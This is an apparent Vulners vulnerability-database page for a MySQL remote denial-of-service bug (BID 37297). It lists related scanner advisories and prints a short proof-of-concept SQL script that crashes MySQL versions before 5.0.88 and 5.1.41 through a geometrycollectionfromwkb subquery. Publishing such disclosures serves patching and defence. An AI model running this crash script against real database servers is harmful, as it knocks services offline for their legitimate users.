MySQL 6.0.9 - 'GeomFromWKB()' Function First Argument Geometry Value Handling Denial of Service
| Reporter | Title | Published | Views | Family All 251 |
|---|---|---|---|---|
| Oracle MySQL < 5.1.41 Multiple Vulnerabilities | 24 Nov 200900:00 | – | nessus | |
| Oracle MySQL < 5.0.88 Multiple Vulnerabilities | 14 Dec 200900:00 | – | nessus | |
| Mac OS X < 10.6.3 Multiple Vulnerabilities | 30 Mar 201000:00 | – | nessus | |
| MySQL < 5.1.41 Multiple Vulnerabilities | 24 Nov 200900:00 | – | nessus | |
| MySQL < 5.0.88 Multiple Vulnerabilities | 14 Dec 200900:00 | – | nessus | |
| CentOS 5 : mysql (CESA-2010:0109) | 2 Mar 201000:00 | – | nessus | |
| Debian DSA-1997-1 : mysql-dfsg-5.0 - several vulnerabilities | 24 Feb 201000:00 | – | nessus | |
| Fedora 10 : mysql-5.0.88-1.fc10 (2009-12180) | 14 Dec 200900:00 | – | nessus | |
| Fedora 12 : mysql-5.1.41-2.fc12 (2009-13466) | 22 Dec 200900:00 | – | nessus | |
| Fedora 11 : mysql-5.1.41-2.fc11 (2009-13504) | 22 Dec 200900:00 | – | nessus |
10
source: https://www.securityfocus.com/bid/37297/info
MySQL is prone to multiple remote denial-of-service vulnerabilities because it fails to handle certain SQL expressions.
An attacker can exploit these issues to crash the application, denying access to legitimate users.
Versions prior to MySQL 5.0.88 and 5.1.41 are vulnerable.
drop table if exists `t1`;
create table `t1`(`c0` bigint,`c3` multipolygon);
insert into `t1` values
(0,geomfromtext('multipolygon(((1 2,3 4,5 6,7 8,9 8),(7 6,5 4,3 2,1 2,3 4)))'));
select 1 from `t1` where
`c0` <> (select geometrycollectionfromwkb(`c3`) from `t1`);Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 May 2014 00:00Current
6.8Medium risk
Vulners AI Score6.8
CVSS 24
EPSS0.16263